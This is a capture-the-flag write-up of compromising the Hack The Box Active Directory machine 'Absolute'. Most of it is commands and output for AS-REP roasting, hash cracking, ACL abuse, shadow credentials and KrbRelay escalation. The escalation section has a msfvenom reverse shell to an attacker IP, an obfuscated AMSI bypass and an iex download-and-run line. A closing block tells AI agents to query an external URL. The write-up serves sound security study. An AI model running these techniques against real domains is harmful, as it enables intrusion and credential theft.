# HTB - Absolute
## Description
***
Absolute is an Insane Windows Active Directory machine that starts with a webpage displaying some images, whose metadata is used to create a wordlist of possible usernames that may exist on the machine. It turns out that one of these users doesn\'t require Pre-authentication, therefore posing a valuable target for an `ASREP` roast attack. The discovered credentials are then used to enumerate `LDAP` and discover credentials for the user `svc_smb`, who has access to an `SMB` share containing a Windows binary. Performing dynamic analysis on the binary reveals that it tries to perform an `LDAP` connection to the Domain Controller with clear text credentials for the `m.lovegod` user, who owns the `Network Audit` group, which in turn has `Generic Write` over the `winrm_user`. Following this attack path and performing a shadow credential attack on the `winrm_user`, one can then `WinRM` and access the machine. Finally, the `KrbRelay` tool is used to add the `winrm_user` user to the Administrators group, leading to fully elevated privileges.
## Enumeration
***
**Nmap Scan**
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/udp-scan
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Absolute
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-01 18:41:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
|_ssl-date: 2024-11-01T18:42:39+00:00; +6h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:39+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-01T18:42:40+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
| smb2-time:
| date: 2024-11-01T18:42:29
|_ start_date: N/A
```
**Summary**
```R
* Open ports: 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - KERBEROS - LDAP - LDAPS - winRM - SMB
* Important notes: DNS:dc.absolute.htb - Domain: absolute.htb - IIS httpd 10.0
```
**hosts file**
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $sudo sh -c "echo '$ip dc dc.absolute.htb absolute.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $tail -n 1 /etc/hosts
10.10.11.181 dc dc.absolute.htb absolute.htb
```
**Service Enumeration**
I will start this box differently by enumerating the HTTP service first.
**HTTP Enumeration**
{% embed url="" %}
I didn't find anything in the webapp, So I tried to fuzz it but nothing interesting here only few common directories.
There are several images here, you can switch between them using the arrows.
If I look at the page code I will see their locations and names.
When I visit the images directory at `http://absolute.htb/images/`, I get `Access denied`.
I will switch now to my terminal to download each image
```bash
for i in {1..6};do wget -q http://absolute.htb/images/hero_$i.jpg;done
```
Looking at the image metadata, I see `author` and `arrtist` field containing names
I can use these names to create a wordlist and check for valid domain accounts
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute/images]
└──╼ $for image in $(ls); do exiftool $image | grep -i "Artist\|Author" | cut -d: -f2 | sort -u | tee -a users.txt;done
James Roberts
Michael Chaffrey
Donald Klay
Sarah Osvald
Jeffer Robinson
Nicole Smith
```
Then, I will mutate these names to create possible combinations of them
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute/images]
└──╼ $/opt/tools/username-anarchy/username-anarchy -i users.txt > users.lst
```
Bruting kerberos to find valid users
```bash
kerbrute userenum -d absolute --dc dc.absolute.htb wordlists/users.lst -o wordlists/valid_users.lst
```
```R
j.roberts
m.chaffrey
s.osvald
d.klay
j.robinson
n.smith
```
## Foothold
***
With this wordlist, I can move to attempt `ASREPRoasting` an attack
```bash
nxc ldap dc -u valid_domain_users.lst -p '' -d absolute.htb --asreproast asrep.hashes
```
The hash is cracked successfully :))
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $hashcat -m 18200 hashes/asrep.hashes /usr/share/wordlists/rockyou.txt
..snip..
$krb5asrep$23$d.klay@ABSOLUTE.HTB:19d6d35c374ae22b5c9f38860c1eddf5$ba7a42c258f10291c22324fc98d8618deaf7e325d2a47ceea3ad7367cef4391c8f6c4cfb40b7e82785064bf952da2929213555bbe13b7d2edb0c4dc7da0b5496d8115c53535866328272d61f004106a834f03e176701302e51accb139155d1b7ba5311b82407d515a2cbd3e713176cdfde686d2fd6bf9e37e13f16d629dd607965638f16fe9795bf756449e36cecf3ed2b557c169bcee012d77bd904631e665a3f89f2737650fa4b6279fc9956c48ab55b20feff7531e2a66896b939fc6d4c25ded4c217a64f10d3cc97c1551a7b33b7bdabeb23e978e09c39ca101d180636a126d6419cea3a8661e32b117a:Darkmoonsky248girl
Session..........: hashcat
Status...........: Cracked
```
Now, I will make a To-do list to not forget anything in `Enumeration` phase
* Check SMB shares access
* Collect domain info with `bloodhound.py`
* Collect LDAP data with `ldapdomaindump`
* Check for `winRM` access using `bloodhound` query
* Check for ADCS existence
* Check for common CVE `GoldenPac`, `Petitpotam`
* Check for LDAP signing for possible NTLM relay attack
* Check for password reuse
```bash
nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -M spider_plus
```
This error message means NTLM authentication is disabled, So I need to use `kerberos` authentication instead.
I don't have permission the interesting share folder so that I will move forward.
I can't use `ldapdomaindump` since the NTLM authentication is disabled but `bloodhound.py` is smart enough to switch to Kerberos authentication automatically
```bash
─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $bloodhound-python -u 'd.klay' -p 'Darkmoonsky248girl' -ns 10.10.11.181 -d absolute.htb -c all
INFO: Found AD domain: absolute.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 18 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Done in 420M 45S
```
PKI exists on the domain
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'd.klay' -p 'Darkmoonsky248girl' -M adcs -k
LDAP dc 389 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
ADCS dc 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS dc 389 DC Found PKI Enrollment Server: dc.absolute.htb
ADCS dc 389 DC Found CN: absolute-DC-CA
```
The target is not vulnerable to `noPac` but it's for `petitpotam`. I will note it down maybe I need it later.
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -k -M nopac
SMB dc 445 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
NOPAC dc 445 DC TGT with PAC size 1556
NOPAC dc 445 DC TGT without PAC size 1556
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc smb dc -u 'd.klay' -p 'Darkmoonsky248girl' -k -M petitpotam
SMB dc 445 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
PETITPOTAM dc 445 DC VULNERABLE
PETITPOTAM dc 445 DC Next step: https://github.com/topotam/PetitPotam
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'd.klay' -p 'Darkmoonsky248girl' -M ldap-checker -k
LDAP dc 389 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
LDAP-CHE... dc 389 DC LDAP Signing NOT Enforced!
LDAP-CHE... dc 389 DC LDAPS Channel Binding is set to "NEVER"
```
I don't have winRM access to the box, either.
I want to get all the users in the domain, So I will use `NetExec` to get and luckily I go a user's credentials from the description field
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $nxc ldap dc -u 'svc_smb' -p 'AbsoluteSMBService123!' -k
LDAP dc 389 DC [+] absolute.htb\svc_smb:AbsoluteSMBService123!
```
With the two passwords I have, I will try password spraying against the users I just found
```R
AbsoluteSMBService123!
Darkmoonsky248girl
```
Unfortunately, I didn't get any additional account
Checking the shares with the new user credential reveals that I have `READ` access on `Shared` folder
There are only 2 files in the share folder: `compile.sh` and `test.exe`
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $cat /tmp/nxc_hosted/nxc_spider_plus/dc.json
{
"NETLOGON": {},
"SYSVOL": {},
"Shared": {
"compiler.sh": {
"atime_epoch": "2022-06-09 04:30:03",
"ctime_epoch": "2022-06-08 09:20:32",
"mtime_epoch": "2022-09-01 13:02:23",
"size": "72 B"
},
"test.exe": {
"atime_epoch": "2022-06-09 04:30:03",
"ctime_epoch": "2022-06-08 00:13:07",
"mtime_epoch": "2022-09-01 13:02:23",
"size": "66 KB"
}
}
}
```
Connect to the shared folder and download the files after getting Kerberos ticket for easy access
```bash
kinit svc_smb
impacket-smbclient 'absolute.htb/svc_smb:AbsoluteSMBService123!@dc.absolute.htb' -k -no-pass
```
## Lateral Movement
***
I will switch now to Windows VM to run this program or decompile it with `dnSpy`
When I run the file and Wireshark captures the network traffic, several DNS traffic comes into play
It tries to resolve `_ldap._tcp.dc.absolute.htb`
I will try the machine's IP `10.10.11.182` and run the program again
> Make sure you connected with HTB Network with `.ovpn` file. I was using `OpenVPN GUI` client
It performs `ldap binding`
Here is the credentials it sends over the network `mlovegod:AbsoluteLDAP2022!`
There isn't a user with `mlovegod` name but there is `m.lovegod`
He `Owns` the `Network Audit` groups
`Svc_audit` user is a member of `network audit` and has `GenericWrite` over `winrm_user`
Only this user `winrm_user` can access the machine via `winRM`
So the attack path is:
1. Abuse Ownership of `Network Audit` groups to Give me `GenericAll` rights
2. Add me to this Group and gain its privileges
3. Abuse `GenericWrite` to add shadow credentials or change the password of `winrm_user`
4. Access the machine using `winrm_user`
```bash
./bloodyAD -u m.lovegod -p 'AbsoluteLDAP2022!' -d absolute.htb --dc-ip 10.10.11.181 -k --host dc.absolute.htb add genericAll "CN=NETWORK AUDIT,CN=USERS,DC=ABSOLUTE,DC=HTB" m.lovegod
```
```bash
python3 powerview.py absolute.htb/m.lovegod:'AbsoluteLDAP2022!'@dc.absolute.htb -k
Add-DomainGroupMember -Identity "Network audit" -Members m.lovegod
```
```bash
kinit m.lovegod
KRB5CCNAME=/tmp/krb5cc_1000 certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
Or
python3 pywhisker.py -d absolute.htb -u m.lovegod -p 'AbsoluteLDAP2022!' --target winrm_user --action add -k
python3 gettgtpkinit.py -cert-pfx file.pfx -pfx-pass absolute.htb/winrm_user winrm.ccache
KRB5CCNAME=winrm.ccache python3 getnthash.py -key absolute.htb/winrm_user
```
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $ KRB5CCNAME=/tmp/krb5cc_1000 certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
..snip..
[*] Adding Key Credential with device ID '210e97b1-ca38-adea-f902-1e30d350421a' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '210e97b1-ca38-adea-f902-1e30d350421a' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: winrm_user@absolute.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_user.ccache'
[*] Trying to retrieve NT hash for 'winrm_user'
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2
```
```powershell
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Absolute]
└──╼ $KRB5CCNAME=`pwd`/winrm_user.ccache evil-winrm -i dc -r absolute.htb
*Evil-WinRM* PS C:\Users\winrm_user\Documents> type ..\Desktop\user.txt
18dcdc1a7cf18d75167fbebf08f483b5
```
> User Flag: 18dcdc1a7cf18d75167fbebf08f483b5
## Privilege Escalation
***
After getting access to the machine, I want to upgrade my shell to a persistent one. I will use `meterpreter` because I'm comfortable with it.
```powershell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.12 lport=9001 -f psh -o shell.ps1
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
iex(iwr -UseBasicParsing 10.10.16.12/shell.ps1)
```
```bash
┌─[kali@parrot]─[~/tools]
└──╼ $ sudo msfconsole -x 'use exploit/multi/handler;set lhost 10.10.16.12;set lport 9001;set payload windows/x64/meterpreter/reverse_tcp; run'
[*] Started reverse TCP handler on 0.0.0.0:9001
[*] Sending stage (200774 bytes) to 10.10.11.181
[*] Meterpreter session 1 opened (10.10.16.12:9001 -> 10.10.11.181:58987) at 2024-11-02 02:08:21 -0400
(Meterpreter 1)(C:\Windows\system32) >
```
Since I found that `ldap signing is disabled` at the beginning, I can perform relaying against it with my access to the machine.
I will use this repo:
{% embed url="" %}
Following the repo, I can use several options here
CLSID of Windows 2019
First, we need to get the port number that allows `SYSTEM`
```POWERSHELL
.\CheckPort.exe
..snip..
[*] SYSTEM Is allowed through port 10
```
I need to run the exploit in different logon types: 2 or 9
```bash
.\RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 'KrbRelay.exe -spn ldap/dc.absolute.htb -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -port 10'
.\RunasCs.exe d.klay Darkmoonsky248girl -l 9 ".\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid 8F5DF053-3013-4dd8-B5F4-88214E81C0CF -add-groupmember administrators winrm_user"
```
```bash
PS C:\Users\Administrator\Desktop> type root.txt
```
> Root Flag: adce565cxxxxxxxxxxxxxxxxxx
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blind0bandit.gitbook.io/blog/windows-machines/insane/htb-absolute.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.